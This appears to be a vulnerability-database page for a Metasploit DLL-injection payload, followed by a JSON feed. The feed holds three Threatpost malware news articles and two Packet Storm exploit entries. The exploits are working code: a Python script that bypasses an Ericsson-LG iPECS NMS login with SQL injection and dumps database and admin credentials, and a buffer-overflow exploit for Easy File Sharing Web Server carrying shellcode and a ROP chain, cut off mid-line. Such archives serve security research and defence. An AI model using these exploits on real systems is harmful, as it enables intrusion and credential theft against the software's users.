Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
1976-01-01T00:00:00
ID MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00
Reliability Normal
Reference https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/bind_ipv6_tcp_uuid
Description
Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)
{"result": {"threatpost": [{"lastseen": "2018-04-25T22:13:12", "references": ["https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", "https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/", "https://threatpost.com/romance-scams-drive-necurs-botnet-activity-in-run-up-to-valentines-day/129897/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/31/2018/04/25125441/MetamorfoSpam.png", "https://threatpost.com/chm-help-files-deliver-brazilian-banking-trojan/129209/"], "description": "A recent spate of financial malware campaigns targeting Brazilian companies, collectively dubbed Metamorfo, uses \u201cspray and pray\u201d spam tactics to ensnare their victims. Across the various offensives, the bad actors are abusing legitimate, signed binaries to load the malicious code.\n\nAs the name Metamorfo suggests, the campaigns share much in common \u2013 including the use of a multi-stage infection path, the use of a legitimate Windows tool as a side-loader and the use of cloud storage to host the bad code \u2013 but with slight, morphing differences.\n\n### Related Posts\n\n#### [Romance Scams Drive Necurs Botnet Activity in Run Up to Valentine\u2019s Day](<https://threatpost.com/romance-scams-drive-necurs-botnet-activity-in-run-up-to-valentines-day/129897/> \"Permalink to Romance Scams Drive Necurs Botnet Activity in Run Up to Valentine\u2019s Day\" )\n\nFebruary 12, 2018 , 12:58 pm\n\n#### [CHM Help Files Deliver Brazilian Banking Trojan](<https://threatpost.com/chm-help-files-deliver-brazilian-banking-trojan/129209/> \"Permalink to CHM Help Files Deliver Brazilian Banking Trojan\" )\n\nDecember 20, 2017 , 3:23 pm\n\n#### [New IcedID Trojan Targets US Banks](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/> \"Permalink to New IcedID Trojan Targets US Banks\" )\n\nNovember 13, 2017 , 12:42 pm\n\nFor instance, in one campaign examined by FireEye Labs, the kill chain starts with an 
email (purporting to concern an electronic funds transfer) containing an HTML attachment. The attachment redirects to a Google-shortened URL, which in turn redirects the victim to a cloud storage site such as GitHub, Dropbox or Google Drive to download a ZIP file. The user has to unzip the archive and double-click the executable for the infection chain to continue.\n\nIf downloaded, the ZIP file unpacks to install the legitimate, signed Windows tool, which is subsequently abused to side-load the banking trojan (also included in the archive).\n\nFrom there, the payload malware sets about spying on the victim to sniff out their online banking activity, comparing the sites they visit against an extensive hardcoded list of Brazilian banking and digital coin URLs. If it finds a match, it creates a folder to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites. FireEye researchers said that the screenshots are continuously saved as .jpg images.\n\nIn another Metamorfo campaign, FireEye observed the malicious emails dangling links instead of attachments. The URLs point to both legitimate and bogus domains, which then redirect to the same cloud sites mentioned above, hosting a slightly different ZIP file. This one contains a malicious executable that drops a VBS file, which then fetches the same side-loading tool and trojan from the C2 server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/31/2018/04/25125441/MetamorfoSpam.png>)\n\nLike the trojan from the first campaign, this sample checks for activity on specific Brazilian bank and digital coin sites; it also performs a country-code check.\n\nThis malware is slightly different however, in that it displays fake forms on top of the banking sites and intercepts credentials from the victims. 
It can also display a fake Windows Update whenever there is nefarious activity in the background.\n\n\u201cThe use of multi-stage infection chains makes it challenging to research these types of campaigns all the way through,\u201d said FireEye researchers Edson Sierra and Gerardo Iglesias, [in an analysis](<https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html>). \u201cThe attackers are using various techniques to evade detection and infect unsuspecting Portuguese-speaking users with banking trojans. The use of public cloud infrastructure to help deliver the different stages plays a particularly big role in delivering the malicious payload.\u201d\n\nThe technique of using a real Windows tool for bad purposes is a unique feature of Metamorfo, they added; but it\u2019s not brand-new. The tactic was first seen by FireEye in the fourth quarter of 2017, when a similar \u201cmalspam\u201d campaign delivered the same type of banking trojan by using an embedded JAR file attached in the email, instead of an HTML attachment or link. 
On execution, the Java code automatically fetched the ZIP archive from Google Drive, Dropbox or Github.", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-25T13:27:00", "title": "Metamorfo Targets Brazilian Users with Banking Trojans", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Malware", "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-25T13:27:00", "id": "METAMORFO-TARGETS-BRAZILIAN-USERS-WITH-BANKING-TROJANS/131441", "href": "https://threatpost.com/metamorfo-targets-brazilian-users-with-banking-trojans/131441/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-25T01:06:22", "references": ["https://www.slideshare.net/DeloitteUS/medical-devices-and-the-internet-of-things-a-threelayer-defense-against-cyber-threats", "https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/", "https://threatpost.com/security-support-ends-for-remaining-windows-xp-machines/113796/", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", "https://threatpost.com/iot-medical-devices-a-prescription-for-disaster/119155/", "https://threatpost.com/inside-the-ccleaner-backdoor-attack/128283/", "https://threatpost.com/remote-wi-fi-attack-backdoors-iphone-7/128163/"], "description": "A freshly minted attack group dubbed Orangeworm has been uncovered, deploying a custom backdoor in mostly healthcare-related environments. It\u2019s bent on laser-focused, comprehensive corporate espionage, with a noisy attack vector that shows that it\u2019s unlikely to be related to nation-state actors.\n\nResearchers first found Orangeworm in the form of an interesting binary in 2016, and looking further it discovered a unique backdoor with capabilities for remote access and malware downloads. 
Symantec, which first identified Orangeworm, developed a unique signature to track it, and has found that after a period of low activity, it has emerged this year as an ongoing and active campaign affecting almost 100 organizations.\n\n### Related Posts\n\n#### [Google Detects and Boots Tizi Spyware Off Google Play](<https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/> \"Permalink to Google Detects and Boots Tizi Spyware Off Google Play\" )\n\nNovember 28, 2017 , 12:40 pm\n\n#### [Inside the CCleaner Backdoor Attack](<https://threatpost.com/inside-the-ccleaner-backdoor-attack/128283/> \"Permalink to Inside the CCleaner Backdoor Attack\" )\n\nOctober 5, 2017 , 5:18 am\n\n#### [Remote Wi-Fi Attack Backdoors iPhone 7](<https://threatpost.com/remote-wi-fi-attack-backdoors-iphone-7/128163/> \"Permalink to Remote Wi-Fi Attack Backdoors iPhone 7\" )\n\nSeptember 27, 2017 , 8:00 am\n\nResearchers [observed](<https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia>) the group installing the backdoor within large international healthcare corporations in the United States, Europe and Asia (the US accounts for the largest number of victims, at 17 percent). Dubbed Kwampirs, the malware lurks in medical devices (including high-tech imaging gear such as X-ray devices and MRI machines); network shares and servers; and platforms that assist patients in completing consent forms for required procedures.\n\nInterestingly, it also goes after the larger supply chain surrounding the end targets, including pharmaceutical companies, IT solution providers for healthcare and equipment manufacturers. 
It\u2019s even set its sights on specialized organizations, such as a company that makes labels that go on prescription bottles.\n\n\u201cThis group is clearly organized, with strong motivations and the capability for developing sophisticated malware,\u201d said Jon DiMaggio, senior threat intelligence researcher at Symantec, in an interview. \u201cWhat they do is clearly aimed at collecting information across the entire healthcare supply chain of their targets. You don\u2019t really see that. What we\u2019re seeing is corporate espionage, not for the sake of sabotage or destruction of equipment, and not for financial gain.\u201d\n\nThe attackers cast a wide net and then choose high-value targets out of the sample \u2013 there\u2019s nothing random or opportunistic about their efforts. From there, they \u201cspend an immense amount of time trying to learn the ins and outs of the target\u2019s systems, including seeking out directories, finding out what everything\u2019s connected to, finding open shares,\u201d explained DiMaggio. \u201cThis is speculation, but if they had source code or pirated technology, it would fit the story and would explain why they\u2019re so interested in how things operate. But that\u2019s just a theory.\u201d\n\nKwampirs propagates using an easily detected worm-like behavior where it replicates across unprotected network shares in old Windows networks, which are something that healthcare environments have an overabundance of. 
Older systems like Windows XP are common in healthcare environments \u2013 so much that even new vertical-specific software is being written for XP by adversaries, thanks to its ease of use and install base, DiMaggio pointed out.\n\nThe threat points out the weak spots in play when it comes to the healthcare cyber-environment, including outdated platforms such as the [unsupported Windows XP](<https://threatpost.com/security-support-ends-for-remaining-windows-xp-machines/113796/>), unpatched [medical devices](<https://threatpost.com/iot-medical-devices-a-prescription-for-disaster/119155/>) and a lack of visibility and control over medical endpoints, servers and networks. In fact, according to a recent [Deloitte & Touche poll](<https://www.slideshare.net/DeloitteUS/medical-devices-and-the-internet-of-things-a-threelayer-defense-against-cyber-threats>), identifying and mitigating the risks of fielded and legacy connected devices represents healthcare\u2019s biggest cybersecurity challenge (30.1 percent).\n\n\u201cLegacy operating systems will always be a rich attack surface for well-constructed viruses like Orangeworm,\u201d Rod Schultz, chief product officer at Rubicon Labs, said via email. \u201cThese older systems have well-understood and, many times, documented flaws that are exploited by these viruses. The verticals being attacked seem to be a direct indicator of who is using this outdated technology. As long as there is something to be stolen from these devices, older operating systems executing in a modern environment will continue to encounter this type of profiteering and attacks.\u201d\n\nWhile the backdoor exfiltrates data as it aggressively moves across the network, a going-forward concern is that it can also download additional malware.\n\n\u201cThe situation could be so much worse; these guys have the capability to wipe hard drives or destroy equipment,\u201d DiMaggio said. 
\u201cThe wake-up call in this is to take note of what happened today, so we\u2019re not having a worse discussion tomorrow. Implementing basic security procedures like patching and network segmentation would prevent this threat with minimal work. And, the healthcare community as a whole needs to push their software vendors to consider security more so than ease-of-use.\u201d", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-24T15:07:00", "title": "Orangeworm Mounts Espionage Campaign Against Healthcare", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Malware", "bulletinFamily": "info", "cvelist": [], "modified": "2018-04-24T15:07:00", "id": "ORANGEWORM-MOUNTS-ESPIONAGE-CAMPAIGN-AGAINST-HEALTHCARE/131381", "href": "https://threatpost.com/orangeworm-mounts-espionage-campaign-against-healthcare/131381/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-24T22:04:01", "references": ["https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/", "https://threatpost.com/ransomware-dominates-verizon-dbir/131102/", "https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY", "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "https://groups.drupal.org/security/faq-2018-002", "https://threatpost.com/cryptominer-malware-threats-overtake-ransomware-report-warns/131237/", "http://www.bbc.com/news/technology-43877677", "https://www.drupal.org/psa-2018-003", "https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/", "https://threatpost.com/rsac-2018-tech-giants-form-cybersecurity-tech-accord/131253/"], "description": "The Ukrainian Energy Ministry has been hit by a ransomware attack \u2013 and for once it looks like this is the work of amateurs, not nation-state attackers bent on making a geopolitical point. 
However, the bad actors appear to have made use of the recently patched Drupal vulnerability, pointing out yet once again that patch management needs to be a top security-posture priority for government and critical infrastructure organizations.\n\nSophisticated APT attackers have repeatedly targeted Ukrainian government networks and critical infrastructure in recent years, and most researchers have pointed the attribution finger squarely towards APTs such as BlackEnergy and threat actors behind malware Bad Rabbit and Petya/ExPetr. However, in this case, the attack seems to be financially motivated.\n\n### Related Posts\n\n#### [RSAC 2018: Tech Giants Form Cybersecurity Tech Accord](<https://threatpost.com/rsac-2018-tech-giants-form-cybersecurity-tech-accord/131253/> \"Permalink to RSAC 2018: Tech Giants Form Cybersecurity Tech Accord\" )\n\nApril 17, 2018 , 3:14 pm\n\n#### [Cryptominer Malware Threats Overtake Ransomware, Report Warns](<https://threatpost.com/cryptominer-malware-threats-overtake-ransomware-report-warns/131237/> \"Permalink to Cryptominer Malware Threats Overtake Ransomware, Report Warns\" )\n\nApril 17, 2018 , 9:01 am\n\n#### [Ransomware Dominates Verizon DBIR](<https://threatpost.com/ransomware-dominates-verizon-dbir/131102/> \"Permalink to Ransomware Dominates Verizon DBIR\" )\n\nApril 10, 2018 , 1:42 pm\n\nResearchers suspect that the incident was two-pronged: First, a hacker (going by the handle \u201cX-zakaria,\u201d according to researchers at AlienVault quoted in a[ BBC](<http://www.bbc.com/news/technology-43877677>) report) was able to deface the website, while a second hacker then used the first actor\u2019s backdoor to go in an encrypt the website\u2019s files. 
The English-language ransom note is demanding 0.1 bitcoin, or about $928 as of this time of writing.\n\n**Limited Damage, Limited Skill**\n\nUkrainian-cyber police spokeswoman Yulia Kvitko called the damage \u201cisolated\u201d, resulting in the defacement and locking up of the ministry website. She [told](<https://www.reuters.com/article/us-china-tech-gender/chinese-tech-giants-government-under-fire-for-men-only-job-ads-idUSKBN1HV0EY>) _Reuters_ that the attacks didn\u2019t affect other government systems or the country\u2019s state-run energy companies.\n\n\u201cThis case is not large-scale. If necessary, we are ready to react and help,\u201d Kvitko said. \u201cOur specialists are working right now \u2026 We do not know how long it will take to resolve the issue. Ukrenergo, Energoatom \u2013 everything is okay with their sites, it\u2019s only our site that does not work.\u201d\n\n\u201cFrom what has been seen, it is clearly multiple cyber-actors, possibly working together, or not, though it\u2019s likely they have been in communication at the minimum,\u201d Joseph Carson, chief security scientist at Thycotic, told Threatpost.\n\nHe added that while the incident shows little advanced skill, it shouldn\u2019t be discounted: \u201cIt\u2019s very likely that the cybercriminals behind this recent cyberattack against the Ukrainian Energy Ministry are testing their new skills in order to improve for a bigger cyberattack later, or to get acceptance into a new underground cyber-group that requires showing a display of skills and ability,\u201d said Carson.\n\nIt\u2019s also interesting to note that the attack used ransomware, which at this point seems almost a throwback threat vector; recently, cryptomining [has gained top billing](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) for financially motivated types, thanks to the skyrocketing value of virtual currencies.\n\n\u201cRansomware has been waning as an overall attack 
vector, with only one device in every 10,000 showing signs of ransomware for the period of August 2017 through January 2018,\u201d Mike Banic, vice president of marketing at Vectra, told us. \u201cThe [WannaCry](<https://threatpost.com/u-s-government-blames-north-korea-for-wannacry/129201/>) attack collected approximately $72,000 in ransom. The industry responded to the NotPetya and WannaCry attacks by patching Windows systems to remove the Eternal Blue exploit and bolstering their data backup and recovery programs. As ransomware started to wane in 2017, we saw a rise in cryptomining, which has been prevalent in higher-education, technology companies and healthcare organizations.\u201d\n\n**An Avoidable Attack: Drupal Vulnerability Exploited**\n\nThe attackers appear to be exploiting the [Drupalgeddon2](<https://groups.drupal.org/security/faq-2018-002>), a highly critical remote code execution bug affecting most Drupal sites, which was disclosed at the end of March (and since patched). That bug is now being actively exploited by hackers stocked with automated tools, including a newly uncovered botnet, dubbed Muhstik, that we [reported on yesterday](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>).\n\nDrupal also [announced](<https://www.drupal.org/psa-2018-003>) this week that a new vulnerability (details are scant) is being patched April 25.\n\n\u201cLooking over the Internet archive of this site, it appears that they were running Drupal 7, which is currently under active attack by automated attackers armed with Drupalgeddon2 exploits,\u201d Craig Young, security researcher at Tripwire, said via email. 
\u201cIt is also possible (although less likely) that someone is already exploiting CVE-2018-7602 which the Drupal team announced just yesterday, but has yet to provide a public fix.\u201d\n\nOrganizations \u2013 especially those running critical, strategic networks, it goes without saying \u2013 should know that off-the-shelf content management systems like Drupal, WordPress and Joomla are widely deployed and a key target of automated exploits. In fact, these platforms may start seeing exploitation within days or even hours of a critical disclosure, added Young: \u201cThese public facing systems must be a top priority for infosec teams.\u201d", "edition": 1, "reporter": "Tara Seals", "published": "2018-04-24T14:34:00", "title": "Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2", "type": "threatpost", "enchantments": {}, "threatPostCategory": "Critical Infrastructure", "bulletinFamily": "info", "cvelist": ["CVE-2018-7602"], "modified": "2018-04-24T14:34:00", "id": "RANSOMWARE-ATTACK-HITS-UKRAINIAN-ENERGY-MINISTRY-EXPLOITING-DRUPALGEDDON2/131373", "href": "https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "Berk Cem Goksel", "published": "2018-04-25T00:00:00", "title": "Ericsson-LG iPECS NMS A.1Ac Credential Disclosure", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10285", "CVE-2018-10286", "CVE-2018-9245"], "modified": "2018-04-25T00:00:00", "id": "PACKETSTORM:147351", "href": "https://packetstormsecurity.com/files/147351/Ericsson-LG-iPECS-NMS-A.1Ac-Credential-Disclosure.html", "sourceData": "`# -*- coding: utf-8 -*- \n \n \n# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. 
Dump \n# Vendor Notification: 03-03-2018 - No response \n# Initial CVE: 04-04-2018 \n# Disclosure: 21-04-2018 \n# Exploit Author: Berk Cem GAPksel \n# Contact: twitter.com/berkcgoksel || bgoksel.com \n# Vendor Homepage: http://www.ipecs.com/ \n# Version: A.1Ac and possibly earlier \n# Tested on: Windows 2008 R2 x64 \n# CVE-2018-9245: Multiple SQL injections \n# CVE-2018-10285: Incorrect access control \n# CVE-2018-10286: Sensitive information disclosure \n \n \n#--------Description--------# \n# \n# \n# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive \n# information such as cleartext database and NMS login credentials, use incorrect \n# access control mechanisms, are vulnerable to MiTM attacks and are prone to \n# SQL injection attacks on multiple parameters. \n# \n# This script dumps some sensitive information. \n# \n# \n# Why use it? \n# \n# Normally, you can bypass the login through the SQLi but will get \"kicked out\". \n# Thankfully, we can leverage this to extract the actual admin credentials for \n# the web app. In order to do this, we must first dump the database \n# credentials in cleartext. \n# \n# \n \n \n \n# Usage = python cred_dump.py IP_adress port \n# Example = python cred_dump.py 192.168.1.35 80 \n \n \nfrom sys import argv \nimport sys \nimport os \nimport time \nimport requests \nimport re \n \n \n \nif len(argv) != 3: \n \nprint \"The script takes two mandatory arguments.\" \nprint \"\\nExample usage: python cred_dump.py 192.168.1.35 80\" \nsys.exit(\"Exiting...\") \n \narg,IP,port=argv \n \n#Log in through SQLi. Otherwise the next POST request is rejected. 
\nsqli_path = \"/nms/php/module/main/main_login.php\" \nsqli_url = \"http://\" + IP + \":\" + port + sqli_path \nsqli_cookies = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nsqli_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/index.html\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\", \"Content-Type\": \"application/x-www-form-urlencoded\"} \nsqli_data={\"id\": \"1\", \"passwd\": \"1' or 1=1--\"} \nr = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data) \nprint(r.status_code, r.reason) \ntime.sleep(1) \n \n \n#Thanks to incorrect access control we can \n#dump cleartext database credentials \ndump_path = \"/nms/php/module/main/main_start.php\" \ndump_url = \"http://\" + IP + \":\" + port + dump_path \nnms_cookie = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nnms_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/nms/index.html\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nnms_data={\"command\": \"nms_start\", \"client_id\": \"20\"} \nr2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data) \nprint(r2.status_code, r2.reason) \n \ndb_cred_dump = r2.content \ntime.sleep(1) \n \n#Extract db user and db pass from the dump \nm = re.search(r\"db_user:'(.*)'.*db_pwd:'([^']*)\", db_cred_dump) \n \nif m is not None: \npostgre_db_user = m.group(1) \npostgre_db_pwd = m.group(2) \nelse: \n \nprint \"Something went wrong parsing the credentials. 
Check the dump manually.\" \n \n \nclient_id = \"2\" #Doesn't really matter \nuser_id = \"10\" #Doesn't matter either \ndb_user = postgre_db_user # This does matter \ndb_pwd = postgre_db_pwd # So does this \n \n \n#Use db user and password to extract admin credentials for the NMS \nusers_path = \"/nms/php/module/init/module_init.php\" \nusers_url = \"http://\" + IP + \":\" + port + users_path \nusers_cookies = {\"mainTab_selectedChild\": \"sysinfoTab\"} \nusers_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Referer\": \"http://192.168.1.55/nms/index.html\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nusers_data={\"command\": \"init_configuration\", \"client_id\": \"2\", \"user_id\": user_id, \"db_user\": db_user, \"db_pwd\": db_pwd, \"mfimSeq\": \"0\", \"req_system_id\": \"0\", \"req_system_name\": ''} \nr3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data) \n \n \nprint(r3.status_code, r3.reason) \n \nuser_dump = r3.content \n \n \nprint \"Done. You can log in to the postgresql database using the below credentials.\" \nprint \"\\ndb_user: \" + postgre_db_user \nprint \"db_pwd: \" + postgre_db_pwd \nprint \"\\nAnd/Or you can log in to the NMS using the following credentials\" \nm1 = re.search(r\"userList:\\[\\[\\d,'([^']*)','([^']*)\", user_dump) \n \nif m1 is not None: \nnms_admin = m1.group(1) \nnms_pwd = m1.group(2) \nprint \"\\ndb_admin: \" + nms_admin \nprint \"db_pwd: \" + nms_pwd \nelse: \nprint \"\\nDid not get nms_admin and nms_pwd. 
Check the dump manually.\" \n \n \ndumpfile = open(\"ipecsnms_dump.txt\",\"w\") \n \ndumpfile.write(db_cred_dump) \ndumpfile.write(user_dump) \ndumpfile.close() \n \nprint \"\\nRaw output written to ipecsnms_dump.txt for further username and group enumeration.\" \nprint \"Have fun!\" \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147351/ericssonlgipecs-disclose.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "Hashim Jawad", "published": "2018-04-24T00:00:00", "title": "Easy File Sharing Web Server 7.2 UserID Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9059"], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147336", "href": "https://packetstormsecurity.com/files/147336/Easy-File-Sharing-Web-Server-7.2-UserID-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n#---------------------------------------------------------------------------------------------------# \n# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) # \n# Date : 04/24/2018 # \n# Exploit Author : Hashim Jawad # \n# Twitter : @ihack4falafel # \n# Author Website : ihack4falafel[.]com # \n# Vendor Homepage : http://www.sharing-file.com/ # \n# Software Link : http://www.sharing-file.com/efssetup.exe # \n# Original Exploit: https://www.exploit-db.com/exploits/44485/ # \n# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 # \n#---------------------------------------------------------------------------------------------------# \n \nimport requests \nimport struct \nimport time \n \nhost='192.168.80.148' \nport='80' \n \n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\" \n# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python \n# Payload size: 447 bytes \n \nshellcode = \"\" 
\nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\" \nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\" \nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\" \nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\" \nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\" \nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\" \nshellcode += \"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\" \nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\" \nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\" \nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\" \nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\" \nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\" \nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\" \nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\" \nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\" \nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\" \nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\" \nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\" \nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\" \nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\" \nshellcode += \"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\" \nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\" \nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\" \nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\" \nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\" 
\n \n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler] \nbuffer = '\\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget) \n \n# mona.py VirtualProtect() ROP template with few modifications \n \n# ESI = ptr to VirtualProtect() \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll] \nbuffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] \n \n# EBP = ReturnTo (ptr to jmp esp) \nbuffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll] \n \n# EDX = NewProtect (0x40) \nbuffer += 
